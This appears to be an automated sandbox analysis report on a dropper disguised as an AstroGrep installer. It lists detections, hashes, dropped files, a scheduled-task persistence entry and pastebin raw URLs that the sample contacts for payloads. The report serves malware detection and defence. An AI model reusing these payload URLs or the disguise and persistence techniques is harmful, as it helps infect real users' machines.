                            3.0.ASTRO-GREP.EXE.5f0000.0.unpack100%AviraTR/Dropper.GenDownload File
                            3.2.ASTRO-GREP.EXE.5f0000.0.unpack100%AviraTR/Dropper.GenDownload File
                            17.2.astro-grep.exe.430000.0.unpack100%AviraTR/Dropper.GenDownload File
                            13.2.astro-grep.exe.770000.0.unpack100%AviraTR/Dropper.GenDownload File
                            1.0.ms.exe.a30000.0.unpack100%AviraTR/Dropper.GenDownload File
                            17.0.astro-grep.exe.430000.0.unpack100%AviraTR/Dropper.GenDownload File
                            1.0.ms.exe.a4b130.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                            13.0.astro-grep.exe.770000.0.unpack100%AviraTR/Dropper.GenDownload File
                            3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack100%AviraHEUR/AGEN.1110362Download File
                            1.2.ms.exe.a4b130.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                            1.2.ms.exe.a30000.1.unpack100%AviraTR/Dropper.GenDownload File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://pastebin.com43l0%Avira URL Cloudsafe
                            https://pastebin.comD83l0%Avira URL Cloudsafe
                            https://pastebin.comD83lh;0%Avira URL Cloudsafe
                            http://schemas.microsof0%URL Reputationsafe
                            http://schemas.microsof0%URL Reputationsafe
                            http://schemas.microsof0%URL Reputationsafe
                            http://schemas.microsof0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            pastebin.com
                            		104.23.98.190
                            		truefalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://pastebin.com43lastro-grep.exe, 0000000D.00000002.462183818.0000000002B36000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008ICSharpCode.AvalonEdit.dll.5.drfalse
                                		high
                                http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081ErrorICSharpCode.AvalonEdit.dll.5.drfalse
                                  		high
                                  http://icsharpcode.net/sharpdevelop/avaloneditICSharpCode.AvalonEdit.dll.5.drfalse
                                    		high
                                    https://pastebin.com/rawastro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmpfalse
                                      		high
                                      https://pastebin.com/raw/VTByvKGMastro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmpfalse
                                        		high
                                        http://astrogrep.sourceforge.net/Ihttp://www.gnu.org/copyleft/gpl.htmlAstroGrep.exe.5.drfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/envelope/NLog.dll.5.drfalse
                                            		high
                                            https://pastebin.comD83lastro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462336171.0000000002C73000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462353763.0000000002C96000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462305606.0000000002C51000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://nlog-project.org/NLog.dll.5.drfalse
                                              		high
                                              https://pastebin.comD83lh;astro-grep.exe, 0000000D.00000002.462235560.0000000002B82000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://nsis.sf.net/NSIS_ErrorErrorASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000003.256251943.000000000074E000.00000004.00000001.sdmp, ms.exefalse
                                                		high
                                                https://www.nuget.org/packages/NLog.Web.AspNetCoreASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.drfalse
                                                  		high
                                                  http://nlog-project.org/ws/TNLog.dll.5.drfalse
                                                    		high
                                                    http://downloads.sourceforge.net/astrogrep/readme.txtAstroGrep.exe.5.drfalse
                                                      		high
                                                      http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsepNLog.dll.5.drfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorASTROGREP_SETUP_V4.4.7.EXE, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ms.exefalse
                                                          		high
                                                          http://nlog-project.org/dummynamespace/NLog.dll.5.drfalse
                                                            		high
                                                            http://downloads.sourceforge.net/astrogrep/AstroGrep.exe.5.drfalse
                                                              		high
                                                              http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessagesNLog.dll.5.drfalse
                                                                		high
                                                                http://www.gnu.org/copyleft/gpl.html#SEC3AstroGrep.exe.5.drfalse
                                                                  		high
                                                                  http://astrogrep.sourceforge.net/download/AstroGrep.exe.5.drfalse
                                                                    		high
                                                                    http://astrogrep.sourceforge.net/version.htmlUhttp://astrogrep.sourceforge.net/download/Whttps://souAstroGrep.Common.dll.5.drfalse
                                                                      		high
                                                                      http://nlog-project.org/ws/NLog.dll.5.drfalse
                                                                        		high
                                                                        http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTNLog.dll.5.drfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameASTRO-GREP.EXE, 00000003.00000002.250692664.0000000002A34000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://pastebin.comastro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://pastebin.comastro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingICSharpCode.AvalonEdit.dll.5.drfalse
                                                                                  		high
                                                                                  http://nlog-project.org/ws/3NLog.dll.5.drfalse
                                                                                    		high
                                                                                    http://schemas.microsofastro-grep.exefalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQICSharpCode.AvalonEdit.dll.5.drfalse
                                                                                      		high
                                                                                      http://nlog-project.org/ws/5NLog.dll.5.drfalse
                                                                                        		high
                                                                                        http://astrogrep.sourceforge.netAstroGrep.exe.5.drfalse
                                                                                          		high
                                                                                          http://www.gnu.org/copyleft/gpl.htmlAstroGrep.exe.5.drfalse
                                                                                            		high

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            185.195.232.251
                                                                                            		unknownSweden
                                                                                            		39351ESAB-ASSEfalse
                                                                                            104.23.98.190
                                                                                            		pastebin.comUnited States
                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                            General Information

                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                            Analysis ID:450276
                                                                                            Start date:17.07.2021
                                                                                            Start time:22:36:15
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 9m 53s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:ms.bin (renamed file extension from bin to exe)
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:34
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal52.troj.evad.winEXE@19/26@1/2
                                                                                            EGA Information:Failed
                                                                                            HDC Information:
                                                                                            • Successful, ratio: 13.8% (good quality ratio 11.6%)
                                                                                            • Quality average: 70%
                                                                                            • Quality standard deviation: 37.1%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 74%
                                                                                            • Number of executed functions: 86
                                                                                            • Number of non-executed functions: 31
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            Warnings:
                                                                                            Show All
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 23.211.6.115, 20.82.210.154, 23.35.236.56, 40.112.88.60, 20.82.209.183, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                                                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            22:37:25Task SchedulerRun new task: astro-grep path: "C:\Users\user\AppData\Roaming\astro-grep.exe"

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            185.195.232.251astro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                                                104.23.98.190C1jT7pIYSJ.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/npsqXhuQ
                                                                                                uwoYazbVds.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/npsqXhuQ
                                                                                                u6Wf8vCDUv.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/BCAJ8TgJ
                                                                                                EU441789083.docGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/BCAJ8TgJ
                                                                                                b095b966805abb7df4ffddf183def880.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                E1Q0TjeN32.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                6YCl3ATKJw.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                Hjnb15Nuc3.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                JDgYMW0LHW.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                4av8Sn32by.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                5T4Ykc0VSK.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                afvhKak0Ir.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                T6OcyQsUsY.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                1KITgJnGbI.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                PxwWcmbMC5.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                XnAJZR4NcN.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                PbTwrajNMX.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                22NO7gVJ7r.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                rE7DwszvrX.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0
                                                                                                VjPHSJkwr6.exeGet hashmaliciousBrowse
                                                                                                • pastebin.com/raw/XMKKNkb0

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                pastebin.comastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                banload.msiGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                SecuriteInfo.com.Trojan.PackedNET.721.17987.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                6rg5Enu1ks.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                Loader.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                banload.msiGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                t3uss3bjUL.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                h3Y0CRAJyq.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                Order Request.xlsxGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                4fy0Wb1EUX.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                CYzY9Pi2ny.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                SgCDxPdEul.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                42C75D53ACD263FF2B2DAD511E40E0E40E9A6119BAA68.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                Request For Quotation.xlsxGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                Lr2Hm9rVac.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                vEJ2Mfxn6p.exeGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                • 104.23.99.190
                                                                                                C1jT7pIYSJ.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                CLOUDFLARENETUSastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                glupteba.exeGet hashmaliciousBrowse
                                                                                                • 104.21.63.250
                                                                                                E2QIvDXi7H.exeGet hashmaliciousBrowse
                                                                                                • 104.21.83.89
                                                                                                JHECEQl1ML.exeGet hashmaliciousBrowse
                                                                                                • 172.67.220.44
                                                                                                UwvHsxxITi.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.209
                                                                                                gVI2IrBzjJ.exeGet hashmaliciousBrowse
                                                                                                • 172.67.201.250
                                                                                                y54fD0dMcF.exeGet hashmaliciousBrowse
                                                                                                • 104.21.87.184
                                                                                                WR0MTpWkYC.exeGet hashmaliciousBrowse
                                                                                                • 172.67.193.180
                                                                                                LPY15536W4.exeGet hashmaliciousBrowse
                                                                                                • 104.21.84.71
                                                                                                SecuriteInfo.com.Trojan.Inject4.14369.15008.exeGet hashmaliciousBrowse
                                                                                                • 162.159.134.233
                                                                                                TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                                • 162.159.138.232
                                                                                                7vLHRD4IdanbLrE.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                PTELOONB39-67.exeGet hashmaliciousBrowse
                                                                                                • 172.67.215.158
                                                                                                o2fAkrQ43w.exeGet hashmaliciousBrowse
                                                                                                • 104.21.51.99
                                                                                                ATT62725.HTMGet hashmaliciousBrowse
                                                                                                • 104.18.11.207
                                                                                                WAdStf9Llw.exeGet hashmaliciousBrowse
                                                                                                • 104.21.51.99
                                                                                                P.O 16.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                F6w8Ll8iWU.exeGet hashmaliciousBrowse
                                                                                                • 162.159.133.233
                                                                                                PCgYjH5fEn.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.209
                                                                                                another.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                ESAB-ASSEastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                • 185.195.232.251
                                                                                                TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                                • 185.65.135.248
                                                                                                NotificationApplicationspdf.exeGet hashmaliciousBrowse
                                                                                                • 141.98.255.146
                                                                                                SgCDxPdEul.exeGet hashmaliciousBrowse
                                                                                                • 185.65.135.248
                                                                                                5icstaf5i1.exeGet hashmaliciousBrowse
                                                                                                • 45.83.220.209
                                                                                                aY5UWK4jxg.exeGet hashmaliciousBrowse
                                                                                                • 45.83.220.209
                                                                                                ewlD3Dwdxy.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.182
                                                                                                byodInstCL.exeGet hashmaliciousBrowse
                                                                                                • 193.32.127.38
                                                                                                SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                                                                • 185.195.232.251
                                                                                                PD0ssyK178.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                EpVgl7WUGD.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                tgv7RXFab7.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                7niXcdi1SU.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                9gee3iCc4N.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                l3eFnAYO6a.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                X97zFKQz4Q.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                jf1w8rsogr.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                s1G5ZwG3Yb.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                3ZhSP5SXgW.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173
                                                                                                wvS1iVG3MK.exeGet hashmaliciousBrowse
                                                                                                • 185.65.134.173

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9ady54fD0dMcF.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                SO-19844 EIDCO.ppamGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                7vLHRD4IdanbLrE.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                IdDetails.ppamGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                P.O 16.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                F6w8Ll8iWU.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                Sirus.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                New Purchase Order-030220.pptGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                ReGQ1vAQp9.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                DHL_119040 Beleg.pptGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                order 0721 Review .doc.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                6rg5Enu1ks.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                RFQ REF R2100131410 pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                samples.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                265.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                Loader.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                Supwaize2.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                download.dat.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                WindowsFormsApp1.exeGet hashmaliciousBrowse
                                                                                                • 104.23.98.190

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dllastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                  C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dllastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                    C:\Program Files (x86)\AstroGrep\NLog.dllastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                      C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exeastro-grep-setup.exe.docGet hashmaliciousBrowse
                                                                                                        C:\Program Files (x86)\AstroGrep\AstroGrep.exeastro-grep-setup.exe.docGet hashmaliciousBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):4.487949196682819
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:+2x9scF3MzO5l+9B9Q6uyT4A3KXr7HazHJ/ylHj/V3ojWNta1FYcCe:5x938OYLsA3YgwN5RszYcCe
                                                                                                          MD5:A06B34EE8AD3B52CE1C76847FC7991A0
                                                                                                          SHA1:D52CBED52AD91E5D297E3F96D7AAA1476A42F087
                                                                                                          SHA-256:0822F460D448356DAE96963C1A56DA2553FE6BB6A859B1646D1A76DBC346F03C
                                                                                                          SHA-512:B4741046E83A89FBFB8848AC649E22D1773B54F5B6C96EE49057C12ADE502DE5594C706BAE140FEF864F3FB1A585A0F8D840C5369073561189C9665CD5FD2CD2
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Reputation:low
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.\.............................-... ...@....@.. ....................................@..................................,..S....@..P....................`.......+............................................... ............... ..H............text...4.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................-......H........"...............................................................0..T.........i.1M..i.0G..~.....r...p......(....&...r)..pr-..po........r)..pr-..po........(....*.0..........~....r/..p.o.....~....rO..p.o.....~....r...p.o......9q....9k....9e....99....r...po......r...po.......r...po.......93.....9,.....9%....r-..p.r...p(....o......r-..p.r...p(....o......r-..p.r...p(....o.....r...pr...p.(....o......r...pr...p.(....o......r...pr...p.(....o.....r...po........r...po........r.
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe.config
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):175
                                                                                                          Entropy (8bit):5.022488547778473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vFWWMNHU8LdgCQcIMOoT02VK/FlURAmIRMNHjFHr0lUfEyhTRRAoe+RAW4QIMOov:TMVBd1I002VKNa7VJdfEyFRRAoeuAW44
                                                                                                          MD5:57717DA46BD278CA043D8101847D8FF4
                                                                                                          SHA1:D93BAADBB3C644D841D7AA4E95DCD76F9897BD05
                                                                                                          SHA-256:12D08F2857A02B5A4EF5DF6EC2D840296AAC4C219704B2FB6F15A7571230A4C5
                                                                                                          SHA-512:A054A7FD69E4A643286212FEDABDE4BDFB36BBF3E7F9FC33524BA8DFECBC375E991C23B4E047F5F235A77E9D6A525F996934A4A993B61E1FE7D84066FF972DF1
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>...</startup>..</configuration>..
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9216
                                                                                                          Entropy (8bit):4.660156886149009
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:MPL93AfzEbqrlLH945OKtueaQJ6BLcSEeC137:MsEbyHGscu3DdkxL
                                                                                                          MD5:2F2899673ABB136BFC8B92A6D3BAFF33
                                                                                                          SHA1:5BE14D5C58AF9F78858DD5E9ED6CD929F87AC0B4
                                                                                                          SHA-256:0E7A71232FB6676777A823ADDB4776BD895ABBE29EA2487110073BD0C5FF6AA6
                                                                                                          SHA-512:CF5B23F4E5417DDC4AB5A354E7EA90C5CCE28133DE7D1AE260F0879E474727DBB73E47C9CB92A98BD5B6F6EBCFC67CD955423FA1615A0D7C24783415325200CA
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\...........!.................9... ...@....... ....................................@..................................9..K....@.......................`......H8............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......@$...............................................................(....,.(....o....(....*..(....~....(....*...0..........(....r...p(.........(....r...p(.........~....~....r...p(....(.........~....~....r...p(....(.........(....o....(.........(....o....(.........*..(....*..{....*"..}....*..{....*"..}....*^~....-.s.........~....*..0...........(....s.....s......r1..p.o.....~....}......{....(....o.....~....(....o.....r;..p(....o .... ..P.jo!.....o".....o#...r...p~$....s%...
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.exe
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):573440
                                                                                                          Entropy (8bit):6.183835631467389
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:uibf6/zxXrXyhwSl9LndCXlhqNWvgVYODH9zG5X1LeihaBQSa:ifEWOYODH9zoX1Le/
                                                                                                          MD5:202C965DE1291E773F7DAE0C495253FB
                                                                                                          SHA1:13EB40E5DF525388D7A2AD18B1720FED78C5EE13
                                                                                                          SHA-256:3138155ABD6A9BADDB63869CD34BF0492718929E910CB4F38BC1767507932B4F
                                                                                                          SHA-512:97445E848DA86876AB324B9C6EC2D27F51BE753ABF1956A79829763F92363B9B7C05A232F876C97A66653109505BAE94BB2B85B53E6F9697698EF8EA2FD21F7A
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 2%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: astro-grep-setup.exe.doc, Detection: malicious, Browse
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.\.................0...........E... ...`....... ....................................@..................................E..W....`...i........................................................................... ............... ..H............text....&... ...0.................. ..`.rsrc....i...`...p...@..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Program Files (x86)\AstroGrep\AstroGrep.exe.config
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):237
                                                                                                          Entropy (8bit):4.960108368394514
                                                                                                          Encrypted:false
